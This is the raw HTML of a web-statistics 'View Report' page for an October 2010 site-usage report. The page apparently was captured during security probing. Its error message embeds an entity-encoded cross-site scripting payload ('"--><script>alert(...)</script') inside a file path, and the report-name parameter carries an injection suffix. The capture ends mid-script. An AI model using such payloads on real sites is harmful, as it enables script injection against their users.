</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Reporting/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="" dir="ltr">
   <form name="aspnetForm" method="post" action="frmViewReports.aspx?Custom=False&amp;ReportType=Standard&amp;subReportName=SiteUsage%5d%5d%3e%3e" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script type="text/javascript">
//<![CDATA[
var PageMethods = function() {
PageMethods.initializeBase(this);
this._timeout = 0;
this._userContext = null;
this._succeeded = null;
this._failed = null;
}
PageMethods.prototype = {
_get_path:function() {
var p = this.get_path();
if (p) return p;
else return PageMethods._staticInstance.get_path();},
GetReportProgress:function(guid,succeededCallback, failedCallback, userContext) {
return this._invoke(this._get_path(), 'GetReportProgress',false,{guid:guid},succeededCallback,failedCallback,userContext); }}
PageMethods.registerClass('PageMethods',Sys.Net.WebServiceProxy);
PageMethods._staticInstance = new PageMethods();
PageMethods.set_path = function(value) { PageMethods._staticInstance.set_path(value); }
PageMethods.get_path = function() { return PageMethods._staticInstance.get_path(); }
PageMethods.set_timeout = function(value) { PageMethods._staticInstance.set_timeout(value); }
PageMethods.get_timeout = function() { return PageMethods._staticInstance.get_timeout(); }
PageMethods.set_defaultUserContext = function(value) { PageMethods._staticInstance.set_defaultUserContext(value); }
PageMethods.get_defaultUserContext = function() { return PageMethods._staticInstance.get_defaultUserContext(); }
PageMethods.set_defaultSucceededCallback = function(value) { PageMethods._staticInstance.set_defaultSucceededCallback(value); }
PageMethods.get_defaultSucceededCallback = function() { return PageMethods._staticInstance.get_defaultSucceededCallback(); }
PageMethods.set_defaultFailedCallback = function(value) { PageMethods._staticInstance.set_defaultFailedCallback(value); }
PageMethods.get_defaultFailedCallback = function() { return PageMethods._staticInstance.get_defaultFailedCallback(); }
PageMethods.set_enableJsonp = function(value) { PageMethods._staticInstance.set_enableJsonp(value); }
PageMethods.get_enableJsonp = function() { return PageMethods._staticInstance.get_enableJsonp(); }
PageMethods.set_jsonpCallbackParameter = function(value) { PageMethods._staticInstance.set_jsonpCallbackParameter(value); }
PageMethods.get_jsonpCallbackParameter = function() { return PageMethods._staticInstance.get_jsonpCallbackParameter(); }
PageMethods.set_path("frmViewReports.aspx");
PageMethods.GetReportProgress= function(guid,onSuccess,onFailed,userContext) {PageMethods._staticInstance.GetReportProgress(guid,onSuccess,onFailed,userContext); }
//]]>
</script>


       <script type="text/javascript">
           self.EnableAnimations = true;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$BPH$UpdatePanel2','','tctl00$UpdatePanel1','','tctl00$MPH$UpdatePanel1','','tctl00$MPH$UP1',''], ['ctl00$MPH$btnGenerateReport','','ctl00$MPH$btnShowReport',''], [], 90, 'ctl00');
//]]>
</script>

       
           <div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
               <div class="RoundedPageTitleLeft">
                   <div id="PageTitle" class="PageTitleText">
                       View Report
                   </div>
               </div>
           </div>
       
       <div id="ctl00_ButtonRow" class="ButtonBar">
           <div class="ButtonBarLeft">
               
   <div id="ctl00_BPH_UpdatePanel2">
   
           
           <div id="ctl00_BPH_btnSendEmail" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="EmailReportPopup(); return false;"><span class="BBInner">Email</span></a></div>
           <div id="ctl00_BPH_btnExport" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ExportReportPopup(); return false;"><span class="BBInner">Export</span></a></div>
           <div id="ctl00_BPH_btnPrint" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="PrintReportPopup(); return false;"><span class="BBInner">Print</span></a></div>
       
</div>

           </div>
           <div class="ButtonBarRight">
               

           </div>
           <div class="ButtonBarClear">
               <div class="ie6fix">
                   &nbsp;</div>
           </div>
       </div>
       
       
       
       <span id="ctl00_UpdatePanel1">
               <div id="ctl00_TipTextDiv" class="TipTextContainer">
                   <div class="TipTextFailure">Import Error: 10/11/2010 8:02 PM - ERROR: Could not save SiteHistory file C:\&#x0022;&#x002D;&#x002D;&#x003E;&#x003C;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;&#x003E;&#x0061;&#x006C;&#x0065;&#x0072;&#x0074;&#x0028;&#x0030;&#x0078;&#x0030;&#x0030;&#x0030;&#x0037;&#x0046;&#x0037;&#x0029;&#x003C;&#x002F;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;\WebLogs\1\SiteConfig.xml.new3. As a precaution, this server has been paused. A reboot may be the best way to solve any file locking problems that may be present.<br><br><br><br></div>
               </div>
           </span>
       
       <div id="Scrollable" class="ContentDiv">
           
   <div class="ReportLoadingProgress" id="ReportLoadingProgress">
       <div class="ProgressContainer" id="ProgressContainer">
           <div class="ProgressBar" id="ProgressBar">
           </div>
       </div>
       <div class="ProgressText" id="ProgressText">
       </div>
   </div>
   <div id="ctl00_MPH_ReportBar" class="ReportOptionsBar">
       <div class='ReportOptionSection'>
           <div>
               <table class='ReportOptionSection'>
                   <tr>
                       <td class='ReportItemOptionLabel'>
                           Date Range
                       </td>
                       <td>
                           <div id="ctl00_MPH_RadStartDate_wrapper" class="RadPicker RadPicker_SmarterTools DatePickerOverride" style="display:inline-block;width:150px;">
   <!-- 2010.2.817.40 --><input style="visibility:hidden;display:block;float:right;margin:0 0 -1px -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_RadStartDate" name="ctl00$MPH$RadStartDate" type="text" class="rdfd_" value="2010-10-05" /><table cellspacing="0" class="rcTable" style="width:100%;">
       <tr>
           <td class="rcInputCell" style="width:100%;"><span id="ctl00_MPH_RadStartDate_dateInput_wrapper" class="RadInput RadInput_SmarterTools" style="display:block;white-space:normal;"><input type="text" value="10/5/2010" id="ctl00_MPH_RadStartDate_dateInput_text" name="ctl00_MPH_RadStartDate_dateInput_text" class="riTextBox riEnabled" style="width:100%;" /><input style="visibility:hidden;float:right;margin:-18px 0 0 -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_RadStartDate_dateInput" name="ctl00$MPH$RadStartDate$dateInput" type="text" class="rdfd_" value="2010-10-05-00-00-00" /><input id="ctl00_MPH_RadStartDate_dateInput_ClientState" name="ctl00_MPH_RadStartDate_dateInput_ClientState" type="hidden" /></span></td><td><a title="Open the calendar popup." href="#" id="ctl00_MPH_RadStartDate_popupButton" onclick="return CalendarPopup($find(&#39;ctl00_MPH_RadStartDate&#39;),&#39;cal&#39;);"><img id="ctl00_MPH_RadStartDate_CalendarPopupButton" src="/App_Themes/Default/Images/16x16/CalendarMonth.gif" alt="Open the calendar popup." style="border-width:0px;" /></a><div id="ctl00_MPH_RadStartDate_calendar_wrapper" style="display: none" ><table id="ctl00_MPH_RadStartDate_calendar" summary="Calendar" cellspacing="0" class="RadCalendar RadCalendar_SmarterTools" border="0">
               <thead>
                   <tr>
                       <td class="rcTitlebar"><table cellspacing="0" summary="title and navigation" border="0">
                           <tr>
                               <td><a id="ctl00_MPH_RadStartDate_calendar_FNP" class="rcFastPrev" title="&lt;&lt;" href="#"></a></td><td><a id="ctl00_MPH_RadStartDate_calendar_NP" class="rcPrev" title="&lt;" href="#"></a></td><td id="ctl00_MPH_RadStartDate_calendar_Title" class="rcTitle">October 2010</td><td><a id="ctl00_MPH_RadStartDate_calendar_NN" class="rcNext" title=">" href="#"></a></td><td><a id="ctl00_MPH_RadStartDate_calendar_FNN" class="rcFastNext" title=">>" href="#"></a></td>
                           </tr>
                       </table></td>
                   </tr>
               </thead><tbody>
   <tr>
       <td class="rcMain"><table id="ctl00_MPH_RadStartDate_calendar_Top" class="rcMainTable" cellspacing="0" summary="October 2010" border="0">
   <thead>
       <tr class="rcWeek">
           <th id="ctl00_MPH_RadStartDate_calendar_Top_cs_0" title="Sunday" abbr="Sun" scope="col">S</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_1" title="Monday" abbr="Mon" scope="col">M</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_2" title="Tuesday" abbr="Tue" scope="col">T</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_3" title="Wednesday" abbr="Wed" scope="col">W</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_4" title="Thursday" abbr="Thu" scope="col">T</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_5" title="Friday" abbr="Fri" scope="col">F</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_6" title="Saturday" abbr="Sat" scope="col">S</th>
       </tr>
   </thead><tbody>
       <tr class="rcRow">
           <td class="rcOtherMonth" title="Sunday, September 26, 2010"><a href="#">26</a></td><td class="rcOtherMonth" title="Monday, September 27, 2010"><a href="#">27</a></td><td class="rcOtherMonth" title="Tuesday, September 28, 2010"><a href="#">28</a></td><td class="rcOtherMonth" title="Wednesday, September 29, 2010"><a href="#">29</a></td><td class="rcOtherMonth" title="Thursday, September 30, 2010"><a href="#">30</a></td><td title="Friday, October 01, 2010"><a href="#">1</a></td><td class="rcWeekend" title="Saturday, October 02, 2010"><a href="#">2</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 03, 2010"><a href="#">3</a></td><td title="Monday, October 04, 2010"><a href="#">4</a></td><td title="Tuesday, October 05, 2010"><a href="#">5</a></td><td title="Wednesday, October 06, 2010"><a href="#">6</a></td><td title="Thursday, October 07, 2010"><a href="#">7</a></td><td title="Friday, October 08, 2010"><a href="#">8</a></td><td class="rcWeekend" title="Saturday, October 09, 2010"><a href="#">9</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 10, 2010"><a href="#">10</a></td><td title="Monday, October 11, 2010"><a href="#">11</a></td><td title="Tuesday, October 12, 2010"><a href="#">12</a></td><td title="Wednesday, October 13, 2010"><a href="#">13</a></td><td title="Thursday, October 14, 2010"><a href="#">14</a></td><td title="Friday, October 15, 2010"><a href="#">15</a></td><td class="rcWeekend" title="Saturday, October 16, 2010"><a href="#">16</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 17, 2010"><a href="#">17</a></td><td title="Monday, October 18, 2010"><a href="#">18</a></td><td title="Tuesday, October 19, 2010"><a href="#">19</a></td><td title="Wednesday, October 20, 2010"><a href="#">20</a></td><td title="Thursday, October 21, 2010"><a href="#">21</a></td><td title="Friday, October 22, 2010"><a href="#">22</a></td><td class="rcWeekend" title="Saturday, October 23, 2010"><a href="#">23</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 24, 2010"><a href="#">24</a></td><td title="Monday, October 25, 2010"><a href="#">25</a></td><td title="Tuesday, October 26, 2010"><a href="#">26</a></td><td title="Wednesday, October 27, 2010"><a href="#">27</a></td><td title="Thursday, October 28, 2010"><a href="#">28</a></td><td title="Friday, October 29, 2010"><a href="#">29</a></td><td class="rcWeekend" title="Saturday, October 30, 2010"><a href="#">30</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 31, 2010"><a href="#">31</a></td><td class="rcOtherMonth" title="Monday, November 01, 2010"><a href="#">1</a></td><td class="rcOtherMonth" title="Tuesday, November 02, 2010"><a href="#">2</a></td><td class="rcOtherMonth" title="Wednesday, November 03, 2010"><a href="#">3</a></td><td class="rcOtherMonth" title="Thursday, November 04, 2010"><a href="#">4</a></td><td class="rcOtherMonth" title="Friday, November 05, 2010"><a href="#">5</a></td><td class="rcOtherMonth" title="Saturday, November 06, 2010"><a href="#">6</a></td>
       </tr>
   </tbody>
</table></td>
   </tr>
</tbody>
           </table><input type="hidden" name="ctl00_MPH_RadStartDate_calendar_SD" id="ctl00_MPH_RadStartDate_calendar_SD" value="[]" /><input type="hidden" name="ctl00_MPH_RadStartDate_calendar_AD" id="ctl00_MPH_RadStartDate_calendar_AD" value="[[1800,1,1],[2200,1,1],[2010,10,11]]" /></div></td>
       </tr>
   </table><input id="ctl00_MPH_RadStartDate_ClientState" name="ctl00_MPH_RadStartDate_ClientState" type="hidden" />
</div>
                       </td>
                       <td class='PaddedText'>
                           to
                       </td>
                       <td>
                           <div id="ctl00_MPH_RadEndDate_wrapper" class="RadPicker RadPicker_SmarterTools DatePickerOverride" style="display:inline-block;width:150px;">
   <input style="visibility:hidden;display:block;float:right;margin:0 0 -1px -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_RadEndDate" name="ctl00$MPH$RadEndDate" type="text" class="rdfd_" value="2010-10-11" /><table cellspacing="0" class="rcTable" style="width:100%;">
       <tr>
           <td class="rcInputCell" style="width:100%;"><span id="ctl00_MPH_RadEndDate_dateInput_wrapper" class="RadInput RadInput_SmarterTools" style="display:block;white-space:normal;"><input type="text" value="10/11/2010" id="ctl00_MPH_RadEndDate_dateInput_text" name="ctl00_MPH_RadEndDate_dateInput_text" class="riTextBox riEnabled" style="width:100%;" /><input style="visibility:hidden;float:right;margin:-18px 0 0 -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_RadEndDate_dateInput" name="ctl00$MPH$RadEndDate$dateInput" type="text" class="rdfd_" value="2010-10-11-00-00-00" /><input id="ctl00_MPH_RadEndDate_dateInput_ClientState" name="ctl00_MPH_RadEndDate_dateInput_ClientState" type="hidden" /></span></td><td><a title="Open the calendar popup." href="#" id="ctl00_MPH_RadEndDate_popupButton" onclick="return CalendarPopup($find(&#39;ctl00_MPH_RadEndDate&#39;),&#39;cal&#39;);"><img id="ctl00_MPH_RadEndDate_CalendarPopupButton" src="/App_Themes/Default/Images/16x16/CalendarMonth.gif" alt="Open the calendar popup." style="border-width:0px;" /></a><div id="ctl00_MPH_RadEndDate_calendar_wrapper" style="display: none" ><table id="ctl00_MPH_RadEndDate_calendar" summary="Calendar" cellspacing="0" class="RadCalendar RadCalendar_SmarterTools" border="0">
               <thead>
                   <tr>
                       <td class="rcTitlebar"><table cellspacing="0" summary="title and navigation" border="0">
                           <tr>
                               <td><a id="ctl00_MPH_RadEndDate_calendar_FNP" class="rcFastPrev" title="&lt;&lt;" href="#"></a></td><td><a id="ctl00_MPH_RadEndDate_calendar_NP" class="rcPrev" title="&lt;" href="#"></a></td><td id="ctl00_MPH_RadEndDate_calendar_Title" class="rcTitle">October 2010</td><td><a id="ctl00_MPH_RadEndDate_calendar_NN" class="rcNext" title=">" href="#"></a></td><td><a id="ctl00_MPH_RadEndDate_calendar_FNN" class="rcFastNext" title=">>" href="#"></a></td>
                           </tr>
                       </table></td>
                   </tr>
               </thead><tbody>
   <tr>
       <td class="rcMain"><table id="ctl00_MPH_RadEndDate_calendar_Top" class="rcMainTable" cellspacing="0" summary="October 2010" border="0">
   <thead>
       <tr class="rcWeek">
           <th id="ctl00_MPH_RadEndDate_calendar_Top_cs_0" title="Sunday" abbr="Sun" scope="col">S</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_1" title="Monday" abbr="Mon" scope="col">M</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_2" title="Tuesday" abbr="Tue" scope="col">T</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_3" title="Wednesday" abbr="Wed" scope="col">W</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_4" title="Thursday" abbr="Thu" scope="col">T</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_5" title="Friday" abbr="Fri" scope="col">F</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_6" title="Saturday" abbr="Sat" scope="col">S</th>
       </tr>
   </thead><tbody>
       <tr class="rcRow">
           <td class="rcOtherMonth" title="Sunday, September 26, 2010"><a href="#">26</a></td><td class="rcOtherMonth" title="Monday, September 27, 2010"><a href="#">27</a></td><td class="rcOtherMonth" title="Tuesday, September 28, 2010"><a href="#">28</a></td><td class="rcOtherMonth" title="Wednesday, September 29, 2010"><a href="#">29</a></td><td class="rcOtherMonth" title="Thursday, September 30, 2010"><a href="#">30</a></td><td title="Friday, October 01, 2010"><a href="#">1</a></td><td class="rcWeekend" title="Saturday, October 02, 2010"><a href="#">2</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 03, 2010"><a href="#">3</a></td><td title="Monday, October 04, 2010"><a href="#">4</a></td><td title="Tuesday, October 05, 2010"><a href="#">5</a></td><td title="Wednesday, October 06, 2010"><a href="#">6</a></td><td title="Thursday, October 07, 2010"><a href="#">7</a></td><td title="Friday, October 08, 2010"><a href="#">8</a></td><td class="rcWeekend" title="Saturday, October 09, 2010"><a href="#">9</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 10, 2010"><a href="#">10</a></td><td title="Monday, October 11, 2010"><a href="#">11</a></td><td title="Tuesday, October 12, 2010"><a href="#">12</a></td><td title="Wednesday, October 13, 2010"><a href="#">13</a></td><td title="Thursday, October 14, 2010"><a href="#">14</a></td><td title="Friday, October 15, 2010"><a href="#">15</a></td><td class="rcWeekend" title="Saturday, October 16, 2010"><a href="#">16</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 17, 2010"><a href="#">17</a></td><td title="Monday, October 18, 2010"><a href="#">18</a></td><td title="Tuesday, October 19, 2010"><a href="#">19</a></td><td title="Wednesday, October 20, 2010"><a href="#">20</a></td><td title="Thursday, October 21, 2010"><a href="#">21</a></td><td title="Friday, October 22, 2010"><a href="#">22</a></td><td class="rcWeekend" title="Saturday, October 23, 2010"><a href="#">23</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 24, 2010"><a href="#">24</a></td><td title="Monday, October 25, 2010"><a href="#">25</a></td><td title="Tuesday, October 26, 2010"><a href="#">26</a></td><td title="Wednesday, October 27, 2010"><a href="#">27</a></td><td title="Thursday, October 28, 2010"><a href="#">28</a></td><td title="Friday, October 29, 2010"><a href="#">29</a></td><td class="rcWeekend" title="Saturday, October 30, 2010"><a href="#">30</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 31, 2010"><a href="#">31</a></td><td class="rcOtherMonth" title="Monday, November 01, 2010"><a href="#">1</a></td><td class="rcOtherMonth" title="Tuesday, November 02, 2010"><a href="#">2</a></td><td class="rcOtherMonth" title="Wednesday, November 03, 2010"><a href="#">3</a></td><td class="rcOtherMonth" title="Thursday, November 04, 2010"><a href="#">4</a></td><td class="rcOtherMonth" title="Friday, November 05, 2010"><a href="#">5</a></td><td class="rcOtherMonth" title="Saturday, November 06, 2010"><a href="#">6</a></td>
       </tr>
   </tbody>
</table></td>
   </tr>
</tbody>
           </table><input type="hidden" name="ctl00_MPH_RadEndDate_calendar_SD" id="ctl00_MPH_RadEndDate_calendar_SD" value="[]" /><input type="hidden" name="ctl00_MPH_RadEndDate_calendar_AD" id="ctl00_MPH_RadEndDate_calendar_AD" value="[[1800,1,1],[2200,1,1],[2010,10,11]]" /></div></td>
       </tr>
   </table><input id="ctl00_MPH_RadEndDate_ClientState" name="ctl00_MPH_RadEndDate_ClientState" type="hidden" />
</div>
                       </td>
                   </tr>
               </table>
           </div>
           <div>
               <table cellspacing='0' class='ReportOptionSection'>
                   <tr>
                       
                       
                       
                       
                       
                       
                       
                       
                       
                       
                       
                       
                       <td class='GenerateReportButton'>
                           <div id="ctl00_MPH_btnGenerateReport" class="BBButton RefreshButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$MPH$btnGenerateReport',''); return false;"><span class="BBInner"></span></a></div>
                       </td>
                   </tr>
               </table>
           </div>
       </div>
       <div class='ReportOptionSection' style='display: none'>
           <div id="ctl00_MPH_UpdatePanel1">
   
                   <table cellspacing='0' class='ReportOptionSection'>
                       <tr>
                           <td class='ReportTitle'>
                               <span id="ctl00_MPH_lblReportTitle"></span>
                           </td>
                           <td class='ReportSubTitle'>
                               (<span id="ctl00_MPH_lblReportSubTitle"></span>)
                           </td>
                       </tr>
                   </table>
               
</div>
       </div>
   </div>
   <input type="hidden" name="ctl00$MPH$hfDMFilename" id="ctl00_MPH_hfDMFilename" />
   <input type="hidden" name="ctl00$MPH$hfDMReport" id="ctl00_MPH_hfDMReport" />
   <div id="ctl00_MPH_UP1">
   
           
           <a id="ctl00_MPH_lnkCancel" href="javascript:__doPostBack(&#39;ctl00$MPH$lnkCancel&#39;,&#39;&#39;)"></a>
       
</div>
   <input type="submit" name="ctl00$MPH$btnShowReport" value="Display Report" id="ctl00_MPH_btnShowReport" style="display: none" />

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
   Logs imported from 1/1/0001 to 12/31/9999

           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('client/frmviewreports', 'Standard\x5fSiteUsage\x5d\x5d\x3e\x3e');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       
   <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=Specific/ProgressBar"></script>

   <script type="text/javascript">
       var loaded = false;
       function DoDataMine(file, report) {
           //location.href = '/Client/frmViewReports.aspx?reporttype=interactive&file=' + file + '&mine=' + report;
           parent.dmFilename = file;
           parent.dmQuery = report;
           parent.UpdateSection('UserDataMining', null, false, false); //filename
       }
       function AddFavoritePopup() {
           var url = "/Client/Popups/frmFavoriteReport.aspx";
           SpawnHyperWindow(url, 375, 320, null);
       }
       function AddFavoritePopup_Interactive() {
           var url = "/Client/Popups/frmFavoriteReport.aspx";
           SpawnHyperWindow(url, 500, 270, null);
       }
       function AddFavoritePopup_SEO() {
           var url = "/Client/Popups/frmFavoriteReport.aspx";
           SpawnHyperWindow(url, 375, 230, null);
       }
       function ExportReportPopup() {
           var url = "/Client/Popups/frmExportReport.aspx";
           window.name = "GenericWindow";
           SpawnHyperWindow(url, 400, 100, null);
       }
       function EmailReportPopup() {
           if (false)
           {
            var url = "/Client/Popups/frmEmailReport.aspx";
            window.name = "GenericWindow";
            SpawnHyperWindow(url, 450, 340, null);
           }
           else
           {
            ShowAlertWindow("In order to send reports through email, SMTP information must be entered into the Email Settings page by a site administrator.");
           }
       }
       function PrintReportPopup() {
           var url = "/Client/Popups/frmPrintPreview.aspx";
           parent.GenericPopup(url, "PrintPreview", "width=700,height=500,resizable=yes,scrollbars=yes,status=no");
       }
       function RadDataMine(filename, miningset, report) {
        SpawnHyperWindowWithElement(
        "/Client/Popups/frmDataMine.aspx?file=" + filename + "&miningset=" + miningset + "&report=" + report,
        400, 130, null, DoDataMine);
       }

       function GetProgressUpdate() {
           PageMethods.GetReportProgress(progressGuid, ProgressBarCallbackComplete, ProgressBarCallbackFailed);
       }
       function DoReportPostBack() {
           //
__doPostBack('ctl00$MPH$btnShowReport','');
       }
       function DoReportCancel() {
           //
__doPostBack('ctl00$MPH$lnkCancel','');;
       }
       function SiteUrlUndefined()
       {
           parent.ShowAlertWindow('The Site URL for this site has not been set. In order to view pages, define this value in the site general settings.');
       }
       var ProgressBarText = 'Processing';

   </script>


   

<script type="text/javascript">
//<![CDATA[
$(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fClient\x2ffrmViewReports\x2easpx?Custom\x3dFalse\x26ReportType\x3dStandard\x26subReportName\x3dSiteUsage\x255d\x255d\x253e\x253e'); });
$(function() { SetTopTitle('View\x20Report'); });
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDateInput, {"_focused":false,"_originalValue":"10/5/2010 12:00:00 AM","_postBackEventReferenceScript":"__doPostBack(\u0027ctl00$MPH$RadStartDate\u0027,\u0027\u0027)","_skin":"SmarterTools","clientStateFieldID":"ctl00_MPH_RadStartDate_dateInput_ClientState","dateFormat":"M/d/yyyy","dateFormatInfo":{"DayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"MonthNames":["January","February","March","April","May","June","July","August","September","October","November","December",""],"AbbreviatedDayNames":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"AbbreviatedMonthNames":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"AMDesignator":"AM","PMDesignator":"PM","DateSeparator":"/","TimeSeparator":":","FirstDayOfWeek":0,"DateSlots":{"Month":0,"Year":2,"Day":1},"ShortYearCenturyEnd":2029,"TimeInputOnly":false},"displayDateFormat":"M/d/yyyy","enabled":true,"incrementSettings":{InterceptArrowKeys:true,InterceptMouseWheel:true,Step:1},"maxDate":"2200-01-01-00-00-00","minDate":"1800-01-01-00-00-00","styles":{HoveredStyle: ["width:100%;", "riTextBox riHover"],InvalidStyle: ["width:100%;", "riTextBox riError"],DisabledStyle: ["width:100%;", "riTextBox riDisabled"],FocusedStyle: ["width:100%;", "riTextBox riFocused"],EmptyMessageStyle: ["width:100%;", "riTextBox riEmpty"],ReadOnlyStyle: ["width:100%;", "riTextBox riRead"],EnabledStyle: ["width:100%;", "riTextBox riEnabled"]}}, null, null, $get("ctl00_MPH_RadStartDate_dateInput"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadCalendar, {"_DayRenderChangedDays":{},"_FormatInfoArray":[["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],["January","February","March","April","May","June","July","August","September","October","November","December",""],["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"dddd, MMMM dd, yyyy h:mm:ss tt","dddd, MMMM dd, yyyy","h:mm:ss tt","MMMM dd","ddd, dd MMM yyyy HH\u0027:\u0027mm\u0027:\u0027ss \u0027GMT\u0027","M/d/yyyy","h:mm tt","yyyy\u0027-\u0027MM\u0027-\u0027dd\u0027T\u0027HH\u0027:\u0027mm\u0027:\u0027ss","yyyy\u0027-\u0027MM\u0027-\u0027dd HH\u0027:\u0027mm\u0027:\u0027ss\u0027Z\u0027","MMMM, yyyy","AM","PM","/",":",0],"_ViewRepeatableDays":{},"_ViewsHash":{"ctl00_MPH_RadStartDate_calendar_Top" : [[2010,10,1], 1]},"_calendarWeekRule":0,"_culture":"en-US","_enableKeyboardNavigation":false,"_enableViewSelector":false,"_firstDayOfWeek":7,"_postBackCall":"__doPostBack(\u0027ctl00$MPH$RadStartDate$calendar\u0027,\u0027@@\u0027)","clientStateFieldID":"ctl00_MPH_RadStartDate_calendar_ClientState","enableMultiSelect":false,"enabled":true,"monthYearNavigationSettings":["Today","OK","Cancel","Date is out of range.","False","True","300","1","300","1"],"skin":"SmarterTools","specialDaysArray":[],"stylesHash":{"DayStyle": ["", ""],"CalendarTableStyle": ["", "rcMainTable"],"OtherMonthDayStyle": ["", "rcOtherMonth"],"TitleStyle": ["", ""],"SelectedDayStyle": ["", "rcSelected"],"SelectorStyle": ["", ""],"DisabledDayStyle": ["", "rcDisabled"],"OutOfRangeDayStyle": ["", "rcOutOfRange"],"WeekendDayStyle": ["", "rcWeekend"],"DayOverStyle": ["", "rcHover"],"FastNavigationStyle": ["", "RadCalendarMonthView RadCalendarMonthView_SmarterTools"],"ViewSelectorStyle": ["", "rcViewSel"]},"useColumnHeadersAsSelectors":false,"useRowHeadersAsSelectors":false}, null, null, $get("ctl00_MPH_RadStartDate_calendar"));
});
Sys.Application.add_init(function() {
